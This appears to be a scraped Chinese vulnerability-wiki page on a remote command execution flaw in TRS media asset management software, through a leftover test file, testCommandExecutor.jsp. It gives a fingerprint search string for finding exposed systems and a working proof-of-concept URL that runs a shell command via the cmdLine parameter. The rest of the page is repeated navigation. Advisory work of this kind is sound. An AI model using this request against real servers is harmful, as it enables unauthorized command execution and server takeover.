拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞

漏洞描述

拓尔思 TRS testCommandExecutor.jsp测试文件存在远程命令执行漏洞，当网站运维者未删除测试文件时，攻击者通过漏洞可以获取服务器权限

漏洞影响

拓尔思-TRS

网络测绘

"TRS媒资管理系统登录页面"

漏洞复现

主页面

验证POC

/mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv=

CMS漏洞

images

OA产品漏洞

images

Web应用漏洞

images

base

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

中间件漏洞

images

云安全漏洞

images

人工智能漏洞

images

其他漏洞

images

开发框架漏洞

images

开发语言漏洞

images

操作系统漏洞

images

数据库漏洞

images

网络设备漏洞

images

拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

images

images

images

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

images

images

images

images

images

images

images

images

images

拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞 ​

漏洞描述 ​

漏洞影响 ​

网络测绘 ​

漏洞复现 ​

拓尔思 TRS testCommandExecutor.jsp 远程命令执行漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现